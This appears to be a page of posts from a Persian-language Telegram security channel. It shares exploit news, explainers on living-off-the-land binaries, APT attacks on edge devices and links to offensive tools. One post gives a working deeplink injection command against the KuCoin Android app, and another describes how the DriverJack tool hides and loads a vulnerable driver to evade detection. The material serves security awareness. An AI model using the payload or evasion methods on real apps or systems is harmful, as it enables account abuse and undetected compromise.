Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین

در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد

adb shell am start   -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'

📎 BlogPost

@Engineer_Computer
#Android
یکی از دغدغه های مدیران و متخصصان امنیت در زمان حادثه اینه که داده ها چقدر و چطور از سازمان خارج شده اند

سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید

#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting

https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c

@Engineer_Computer
سلام
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید

و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇

@Developer_Network

#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1

@Engineer_Computer
👍1
مجموعه مقالات #امنیت_به_زبان_ساده

دو واژه : LoLBin و LOLBAS

انجام هک در سالها پیش از اقلام محدودی تشکیل شده بود. یعنی هکر با یک یا دو عمل ، ویروسی می نوشت و تخریب مد نظر را انجام میداد یا با هک یک وبسایت به کل  دارایی های سازمان تسلط می یافت.

روز به روز به تکنیک های هک افزوده شد و آن تکنیک هاپیچیده شدند و درقالب تاکتیک هایی تجمیع گردیدند. در طرف مقابل تیم امنیت هم بر توان و قدرت دفاعی و کشفی خود افزود. این شد که نفوذ برای دزدی یا تخریب اطلاعات مشکل شد. 
در این بین بدلیل مهاجرت سازمانها به فضای دیجیتال ، بخش عمده ای از سازمان به فضای سایبری منتقل شدند. و این سطح تاثیر سازمان از هکر ها را افزایش داد.

لذا سازمانها سعی کردند با پیاده سازی مکانیسم دفاع لایه ای به مقابله با نفوذ بپردازند به نحوی که با وجود گسترش فضای دیجیتال در سازمان؛  حجم ریسک‌ها کنترل شده باقی بماند.

در این بین هکرها راهی جدید برای نفوذ پیدا کردند. اصولا امروزه هک شامل یک یا دو قدم معدود نمی‌شود و انجام هک در سازمان شامل چندین پله و شامل فرآیند است. که مجموعه آنرا میتوانید در جدول ATT&CK  ملاحظه کنید.

در روش‌های نفوذ جدید ؛ هکر ها از ابزارهای موجود روی سیستم های سازمان علیه خود سازمان استفاده می‌کنند.
این روش چه مزیتی دارد ؟

اول اینکه این ابزار ها کاملا در دسترس هستند و نیازی به انتقال آنها به شبکه و سیستم قربانی نیست.
دوم اینکه سیستمهای امنیتی به این اقلام اعتماد دارند.
سوم اینکه با استفاده از این ها ، رد پای کمتری باقی می‌ماند و جرم شناسی و شکار توسط امنیت چی ها سخت می‌شود.

البته نکات دیگری در این میان هست که فعلا برای جلوگیری از اطاله کلام از آنها چشم پوشی میکنم تا لب مطلب اخذ گردد.

حالا برویم سراغ واژه ای که در ابتدای متن گفته شد:

به مجموعه ای از باینری هایی که در سیستم های سازمان وجود دارد و ما به آنها اعتماد داریم ولی در طول سال‌ها از آنها سوء استفاده شده است  LoLBin و LOLBAS گفته می‌شود یعنی :
Living of the land binary

این یعنی هکر در مراحلی از نفوذ خودش؛  ابزارهای نفوذ را می‌سازد یا از جایی تهیه می‌کند ولی در مراحل دیگری از نفوذ ، او از این مجموعه باینری خود سیستم عامل یا سامانه برای تقویت یا افزایش نفوذ و یا اقداماتی چون خروج داده از سازمان و یا رمزنگاری آنها استفاده می‌کند.

این مساله مشکلی در راه مقابله و کشف نفوذ ایحاد کرده است. البته در SOC ها راهکارهایی برای این موضوع پیاده می‌شود.

لیست این پاینری ها در پروژه ای جمع آوری شده است که در لینک زیر آنها را ببینید.
https://lolbas-project.github.io/#

#آموزش #امنیت #امنیت_سایبری
#امنیت_به_زبان_ساده
#cybersecurity #threathunting #cyberforensics

🔆 برای آگاهی دیگران ، دانش را نشر دهید و این پست را فوروارد کنید
@Engineer_Computer
گزارش ISC2
آنچه نیروی کار امنیت فکر می‌کند بازار نیاز دارد
آنچه استخدام کنندگان می‌خواهند

https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen

@Engineer_Computer
Forwarded from Network Security Channel
سلام
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید

و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇

@Developer_Network

#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1

@Engineer_Computer
2🔥2
در این حمله چین تارگت شد.

لینک گزارش حمله در زیر

مطالعه گزارش رو برای سطح ۲ مرکز عملیات امنیت توصیه میکنم

https://www.trendmicro.com/en_no/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html


**از جایی به بعد دوره رفتن کمتر لازمه و بهتره چنین گزارش هایی دائم پیگیری بشه
#cybersecurity #threathunting #securityawareness #risk

@Engineer_Computer
1👍1
♨️ ابزار DriverJack به منظور بارگذاری یک درایور آسیب‌پذیر در سیستم از تکنیک‌های کمتر شناخته شده NTFS استفاده می‌کند. هدف اصلی این ابزار، دور زدن روش‌های معمول برای ثبت و بارگذاری درایورها در سیستم است. این ابزار با ربودن سرویس‌های موجود و جعل مسیرهای درایور، میتواند موفق به پنهان‌سازی درایور مخرب شود.

☠️ مراحل کلیدی حمله

🦠 دور زدن ثبت سرویس درایور
این روش به مهاجم اجازه می‌دهد که بدون نیاز به ثبت سرویس درایور جدید، از سرویس‌های موجود در سیستم سوءاستفاده کند و درایور آسیب‌پذیر را بارگذاری کند

🦠 جعل مسیر درایور
در هنگام بارگذاری درایور، مسیر فایل درایور به‌گونه‌ای جعل می‌شود که به نظر برسد فایل درایور از مسیری دیگر (مثلاً یک فایل ISO نصب شده) بارگذاری شده است. این کار تشخیص درایور مخرب را توسط سیستم‌های نظارتی دشوارتر می‌کند

🦠 سوءاستفاده از سیستم فایل شبیه‌سازی شده (Emulated Filesystem)
ابزار DriverJack همچنین از یک ضعف در سیستم فایل استفاده می‌کند که به آن امکان می‌دهد فایل‌های موجود روی فایل‌سیستم‌های شبیه‌سازی شده (مثل ISO) را به صفحاتی قابل نوشتن (RW) مجدد تبدیل کند و محتوای آن‌ها را تغییر دهد. این تکنیک به عنوان "Read-Only Bypass" شناخته می‌شود و در کتابخانه IoCdfsLib پیاده‌سازی شده است.

📚 در سیستم‌عامل ویندوز، فایل‌ها و دایرکتوری‌ها می‌توانند به صورت شبیه‌سازی شده (Emulated) بارگذاری شوند. این یعنی فایل‌ها می‌توانند از طریق فایل‌های ایمیج، مانند فایل‌های ISO، به سیستم معرفی شوند و به نظر برسد که بخشی از سیستم فایل عادی هستند. به عنوان مثال، وقتی یک فایل ISO را روی سیستم باز می‌کنید، محتوای آن به صورت یک درایو مجازی (مثل درایو CD) در سیستم نمایش داده می‌شود و این درایو به طور معمول فقط خواندنی (Read-Only) است، یعنی نمی‌توانید محتویات آن را تغییر دهید.
💢 این ابزار با استفاده از کتابخانه IoCdfsLib ، فایل‌های موجود در این درایو مجازی را از حالت فقط خواندنی به قابل نوشتن تبدیل می‌کند
سپس محتوای این فایل‌ها را تغییر می‌دهد تا درایور مخرب خود را جایگزین فایل‌های معتبر کند.

🕷 پس از دستکاری فایل‌ها، درایور مخرب به عنوان یک فایل معتبر از درایو ISO بارگذاری می‌شود، و این فرآیند به سیستم اجازه می‌دهد تا بدون تشخیص مخرب بودن، این درایور را بارگذاری کند.
👁‍🗨 https://github.com/klezVirus/DriverJack

#tools
#RedTeam

@Engineer_Computer
1
⭕️ از سال 2020، گروه‌های هکری وابسته به چین به دستگاه‌های edge مانند فایروال‌ها، VPNها و دستگاه‌های اینترنت اشیا (IoT) در زیرساخت‌های دولتی تایوان نفوذ کردند
این هکرها با استفاده از آسیب‌پذیری‌های (0-day) در دستگاه‌هایی مانند فایروال‌های Sophos و VPNهای Array SSL، از این دستگاه‌ها برای ایجاد بات‌نت‌ها، پخش اطلاعات نادرست و سرقت داده‌های حساس استفاده می‌کنند.

🔺 این حملات شامل تکنیک‌های پیشرفته‌ای مانند بک‌دورهای مبتنی بر port-knocking و سو استفاده از (LoLbin) هستند که به مهاجمان اجازه می‌دهد تا بدون شناسایی توسط نرم‌افزارهای امنیتی به سیستم‌ها نفوذ کنند و کنترل آنها را به دست بگیرند.

♨️ در این ارائه، نمونه‌های واقعی از دستگاه‌های edge که توسط این حملات هدف قرار گرفته‌اند و راه‌های مقابله با این تهدیدات را بررسی خواهد کرد.


🌐 https://www.youtube.com/watch?v=PSaix1C-UMI
Slides: https://teamt5.org/en/posts/black-hat-asia-2024/

#RedTeam
#APT
#Black_Hat_Asia_2024

@Engineer_Computer
tools
Offensive security
1. Loading BOF on Linux
https://lnkd.in/dawuC5mv
2. Ransomware Tool Matrix
https://lnkd.in/dcYxh6Hp
3. cryptography
Project Wycheproof tests crypto libraries against known attacks
https://lnkd.in/dhAgnijc

@Engineer_Computer
📣 با توجه به استقبال بی‌نظیر و حضور گسترده‌ی شما در اولین جلسه‌ی دوره‌ی یادگیری ماشین دانشکده‌ی مهندسی کامپیوتر دانشگاه صنعتی شریف، و مشکلات فنی در پخش آن، به اطلاع می‌رسانیم که کلاس فردا، ۳ مهر، از ساعت ۹ الی ۱۰:۱۵ صبح، به صورت زنده از طریق کانال آپارات به نشانی https://www.aparat.com/SharifML/live و همچنین از طریق لنز به نشانی https://lenz.ir/epgs/2167 پخش خواهد شد. این کلاس برای تمامی مخاطبان داخل و خارج از کشور قابل مشاهده خواهد بود.

📣 از هفته‌ی دوم مهر ماه، در بستر کلاس مجازی نیز میزبان شما خواهیم بود تا ارتباط تعاملی بهتری صورت گیرد. اطلاعات تکمیلی در این خصوص متعاقباً از طریق وب‌سایت و کانال تلگرام دوره به اطلاع شما عزیزان خواهد رسید.

از همراهی شما صمیمانه سپاس‌گزاریم.
Please open Telegram to view this post
VIEW IN TELEGRAM